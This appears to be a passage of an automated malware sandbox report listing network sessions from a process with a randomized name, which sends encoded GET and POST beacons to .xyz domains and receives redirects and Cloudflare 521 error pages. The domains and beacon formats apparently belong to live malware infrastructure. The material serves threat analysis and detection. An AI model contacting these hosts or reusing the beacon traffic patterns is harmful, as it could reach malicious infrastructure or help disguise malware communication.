                                                                                                                          Data Ascii: qFHlI=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahxjhut+oeSYDFrteNhY+WFTZt/T644CVFp+3iLrjvRjCFIqjahIV+XTv16CXFDrZexkNLpRhQjw1zkKDxMIboSqEObJF9ApK+UHs6sX3EwYnwzZLFblhnIntqsUkKuX9QQB8uI7GXt/3yNXCeaXWyatvBNvYdkfGIzsJF5wF+oQg3SLONZbc2ptiX+ltz9yLohI1xaWWZJgQ9YGrlKMjZ1bbQk+gHWGU2GoQY2FXEDKcW3psyPkNhbzQoJwTt+JZ1RYcWZbOBGpcwtjahYjtTgr+o1BP1FFvZg4sbO+w/iiCjZ19DAT2A53yQ/l0Li3qXejnWKwqM1uAdknGKiikU9JEwh6Ata8l6zp7PNXEb8tkhqqH5qPmcEx6EhVGT6TOPv28IWzrEf4gO2sFsADBpAa9eVUbhp0KS2j7w8ArU+3kDnypFrau1f5bhyEXNmT8HlGiP1+T3KgU1dCPX3S/1TZWcUH7sqG5J299pBl3cxBYWmnQ2Z6AtOFBnyVgCDyOBMgOD0UHFQZRu1jdWjWKX1Tq2ESSx3c48BzsWr8yEbNWBovcaaJn+mDIxXrnCu1q8+FZUMgRxtuhm7S44hGWtBTro3B2L0uZ/bHQSaWgnwRaxQdSYlvXvQTtv9PVaGWQSPG9dL7dowskLG7Gm+PrfKQCFivlppX3fA2Z+12urT0z4nnWXmMQtMgnhO5pY4FJ1LqtcE93pSIfltUxyTy84i3luaGAx1XD+FazYj9M2gj1XgiKBwU40CHksik6GLUta5GlON43xrJkRM9q/JX2o4gxu/atQ5INmcdOsRisfgLgywfarUrVNNgzgTW+Hf88cwDqcvxASyD5P4uWdhqWeBtMCr2SFxbDFx7FeFyU9vGJ/N1NaT88mXJ/jYpFgUQLdBqHxVADVxmCSrgw0yl2u8iMcsu+r98zFfSS2fEvt3aOAIiLwp/4wgHCwq3TNHqjOn6AT [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:25:33.574793100 CEST245INHTTP/1.1 302 Found
                                                                                                                          Location: https://www.sailforever.xyz/hshp/
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:33 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.650000103.106.67.112802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:35.515748024 CEST498OUTGET /hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.sailforever.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:25:36.321356058 CEST673INHTTP/1.1 302 Found
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Location: https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0
                                                                                                                          Server: Dynamic Http Server
                                                                                                                          X-Ratelimit-Limit: 101
                                                                                                                          X-Ratelimit-Remaining: 100
                                                                                                                          X-Ratelimit-Reset: 1
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:36 GMT
                                                                                                                          Content-Length: 223
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 61 69 6c 66 6f 72 65 76 65 72 2e 78 79 7a 2f 68 73 68 70 2f 3f 71 46 48 6c 49 3d 4d 42 69 45 53 72 30 68 50 6d 67 56 46 75 53 44 67 54 31 73 39 32 6a 65 77 48 58 31 54 73 38 42 6a 66 4c 75 73 39 30 4f 61 67 4e 67 68 50 31 62 6f 71 79 35 47 41 54 57 43 63 6b 50 37 32 52 2f 4d 74 36 64 77 72 41 62 4e 6c 78 71 67 33 7a 57 6b 36 5a 41 4f 33 49 71 32 72 56 68 57 39 58 76 2f 6c 47 2f 64 30 61 72 61 38 39 79 62 76 70 58 33 79 76 65 72 44 45 31 66 42 39 71 53 62 79 73 59 4e 44 63 4d 64 67 3d 26 61 6d 70 3b 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                          Data Ascii: <a href="https://www.sailforever.xyz/hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&amp;DJ=uNx48jdPyvmhqtM0">Found</a>.


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.650001188.114.96.3802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:41.430562019 CEST769OUTPOST /bd77/ HTTP/1.1
                                                                                                                          Host: www.launchdreamidea.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.launchdreamidea.xyz
                                                                                                                          Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 61 64 33 48 36 65 32 66 71 72 32 70 75 2f 6a 57 62 75 65 38 5a 45 47 4b 6e 61 5a 45 54 4a 64 51 4c 33 35 32 41 52 70 4c 79 38 53 4e 64 30 65 32 64 44 79 6f 46 6b 55 57 42 75 6e 77 5a 32 6f 69 61 64 4d 6c 47 74 76 6a 7a 6c 64 4d 6b 44 37 35 32 34 38 72 59 73 47 44 50 4d 57 42 63 4a 76 50 42 2f 64 65 6c 7a 61 41 46 34 45 34 32 61 49 51 52 62 33 4f 56 6e 52 55 55 4d 6b 57 6c 48 69 53 49 2f 4a 42 38 69 6f 57 79 42 79 52 59 63 57 48 47 39 46 33 78 78 38 73 74 7a 63 2f 6d 76 69 52 6e 34 38 47 54 44 4a 46 52 4a 78 5a 31 70 73 76 58 6b 39 77 48 59 6e 6e 61 58 69 5a 57 5a 47 4e
                                                                                                                          Data Ascii: qFHlI=nW04OhvCZUUGad3H6e2fqr2pu/jWbue8ZEGKnaZETJdQL352ARpLy8SNd0e2dDyoFkUWBunwZ2oiadMlGtvjzldMkD75248rYsGDPMWBcJvPB/delzaAF4E42aIQRb3OVnRUUMkWlHiSI/JB8ioWyByRYcWHG9F3xx8stzc/mviRn48GTDJFRJxZ1psvXk9wHYnnaXiZWZGN
                                                                                                                          Oct 21, 2024 17:25:41.935950041 CEST1236INHTTP/1.1 521
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 6879
                                                                                                                          Connection: close
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sKf9Rl30VwZpejbimpEf7Ps4YFjqQbrkkZyqO9XMCDJ6cOPXPqTw3VZWAiMH2jQ5jW3APiMcX0Fjm6GuL3QwbGPLYYDN3J8lgm2zCm9oGSeBOYTXU0gLqBoBazPWLItQ4fdxqphC44a3UA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Referrer-Policy: same-origin
                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d62430039231891-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1228&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d
                                                                                                                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--
                                                                                                                          Oct 21, 2024 17:25:41.935970068 CEST1236INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20
                                                                                                                          Data Ascii: ><head><title>www.launchdreamidea.xyz | 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robo
                                                                                                                          Oct 21, 2024 17:25:41.935985088 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20
                                                                                                                          Data Ascii: <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border
                                                                                                                          Oct 21, 2024 17:25:41.936049938 CEST1236INData Raw: 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e
                                                                                                                          Data Ascii: rer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:blo
                                                                                                                          Oct 21, 2024 17:25:41.936064005 CEST848INData Raw: 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 61 79 2d 36 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33 3e 0a 20 20 3c 73 70 61 6e
                                                                                                                          Data Ascii: text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg:w-full m
                                                                                                                          Oct 21, 2024 17:25:41.936075926 CEST1236INData Raw: 6d 62 2d 32 22 3e 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 6f 66 20 74 68 69 73 20 77 65 62 73 69 74 65 3a 3c 2f 68 33 3e 0a 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 36 22 3e 50 6c 65 61 73 65 20 74 72 79 20
                                                                                                                          Data Ascii: mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your hosting provider
                                                                                                                          Oct 21, 2024 17:25:41.936213970 CEST774INData Raw: 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d
                                                                                                                          Data Ascii: </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.launchdreamidea.x


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.650002188.114.96.3802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:43.983957052 CEST793OUTPOST /bd77/ HTTP/1.1
                                                                                                                          Host: www.launchdreamidea.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.launchdreamidea.xyz
                                                                                                                          Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 35 51 4b 58 4a 32 42 51 70 4c 78 38 53 4e 49 45 65 2f 41 7a 79 68 46 6b 6f 6f 42 73 7a 77 5a 79 34 69 61 64 38 6c 48 65 48 67 79 31 64 43 78 7a 37 2f 37 59 38 72 59 73 47 44 50 50 71 72 63 4a 6e 50 42 72 68 65 6b 58 4f 48 49 59 45 2f 68 71 49 51 47 72 33 4b 56 6e 52 36 55 4e 6f 73 6c 46 61 53 49 2b 5a 42 38 78 77 52 34 42 79 54 58 38 58 56 47 66 67 6b 39 33 39 78 71 78 46 53 6d 74 65 6e 76 75 39 63 50 77 4a 6d 44 5a 52 62 31 72 30 64 58 45 39 61 46 59 66 6e 49 41 75 2b 5a 74 6a 75 2b 75 4b 50 68 49 66 44 7a 79 34 4a 7a 76 50 48 2b 56 54 71 5a 41 3d 3d
                                                                                                                          Data Ascii: qFHlI=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT75QKXJ2BQpLx8SNIEe/AzyhFkooBszwZy4iad8lHeHgy1dCxz7/7Y8rYsGDPPqrcJnPBrhekXOHIYE/hqIQGr3KVnR6UNoslFaSI+ZB8xwR4ByTX8XVGfgk939xqxFSmtenvu9cPwJmDZRb1r0dXE9aFYfnIAu+Ztju+uKPhIfDzy4JzvPH+VTqZA==
                                                                                                                          Oct 21, 2024 17:25:44.510607958 CEST1236INHTTP/1.1 521
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:44 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 6879
                                                                                                                          Connection: close
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5X8LMC0Lyfi4rRTLC0sysX%2FRiJb5HY5J0VNeV2d%2B92XmyhfXTLftMNPZAAEKNySBA0V58e2NfbVxqeP5MPsRAX8ZknHU9FwtLNm3NKAJvw9I4c%2F6i%2BNux0%2FPrdTzlhAfMA2pS%2FR87rFcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Referrer-Policy: same-origin
                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6243101a8219ef-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d
                                                                                                                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> <!-
                                                                                                                          Oct 21, 2024 17:25:44.510621071 CEST1236INData Raw: 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74
                                                                                                                          Data Ascii: -<![endif]--><head><title>www.launchdreamidea.xyz | 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><met
                                                                                                                          Oct 21, 2024 17:25:44.510632992 CEST424INData Raw: 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                          Data Ascii: gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border
                                                                                                                          Oct 21, 2024 17:25:44.510639906 CEST1236INData Raw: 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 6f 6b 20 77 2d 31 32 20 68 2d 31 32 20 61 62 73 6f 6c 75 74
                                                                                                                          Data Ascii: h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </div> <span class="md:block w-full truncate">You</span> <h3 class="md:inline-blo
                                                                                                                          Oct 21, 2024 17:25:44.510648966 CEST1236INData Raw: 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 65 72 72 6f 72 63 6f 64 65 5f 35 32 31 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 22 20 74 61 72 67 65 74
                                                                                                                          Data Ascii: rror-landing?utm_source=errorcode_521&utm_campaign=www.launchdreamidea.xyz" target="_blank" rel="noopener noreferrer"> Cloudflare </a> </h3> <span class="leading-1.3 text-2xl text-green-success">Working</span></div><div id="cf-h
                                                                                                                          Oct 21, 2024 17:25:44.510656118 CEST424INData Raw: 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 33 78 6c 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 6c 65 61 64 69 6e 67 2d 31 2e 33 20 6d 62 2d 34 22 3e 57 68 61 74 20 68 61 70 70 65 6e 65 64 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2> <p>The web server is not returning a connection. As a result, the web page is not displaying.</p> </div> <div class="w
                                                                                                                          Oct 21, 2024 17:25:44.510703087 CEST1236INData Raw: 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 6d 62 2d 32 22 3e 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 6f 66 20 74 68 69 73 20 77 65 62 73 69 74 65 3a 3c 2f 68 33 3e 0a 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 36 22
                                                                                                                          Data Ascii: nt-semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your host
                                                                                                                          Oct 21, 2024 17:25:44.510710001 CEST786INData Raw: 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72
                                                                                                                          Data Ascii: ll;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.launc


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.650003188.114.96.3802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:46.538314104 CEST1806OUTPOST /bd77/ HTTP/1.1
                                                                                                                          Host: www.launchdreamidea.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.launchdreamidea.xyz
                                                                                                                          Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 78 51 4b 6b 78 32 4f 54 78 4c 77 38 53 4e 4a 45 65 79 41 7a 7a 68 46 6b 77 6b 42 73 2f 4b 5a 30 6b 69 62 2b 30 6c 41 76 48 67 38 31 64 43 7a 7a 37 36 32 34 39 6a 59 76 75 48 50 4d 53 72 63 4a 6e 50 42 71 78 65 6a 44 61 48 4b 59 45 34 32 61 4a 52 52 62 32 74 56 6e 5a 4d 55 4e 74 52 6b 31 36 53 52 65 70 42 2b 44 6f 52 30 42 79 4e 57 38 57 51 47 66 64 38 39 33 4a 39 71 77 77 4a 6d 74 71 6e 2f 34 6b 55 58 77 31 6e 57 59 63 34 6d 35 74 34 57 7a 34 71 41 4c 37 5a 41 6a 53 51 55 38 66 64 77 2b 43 49 70 4c 2b 44 39 52 59 2b 34 34 57 50 33 6c 61 50 64 57 6c 75 38 48 45 77 67 48 6a 36 71 37 4e 33 68 75 4a 4e 76 52 6a 56 47 73 46 4e 2b 51 73 2f 4d 31 56 73 56 46 67 75 45 39 68 5a 44 32 52 38 46 74 6f 45 38 62 73 4c 33 35 74 73 61 77 45 54 63 6b 53 4d 49 30 6a 61 32 31 79 74 69 48 51 4c 37 52 68 54 52 41 32 78 44 43 71 71 67 48 2f 46 68 75 6c 62 74 37 79 6b 61 38 39 70 [TRUNCATED]
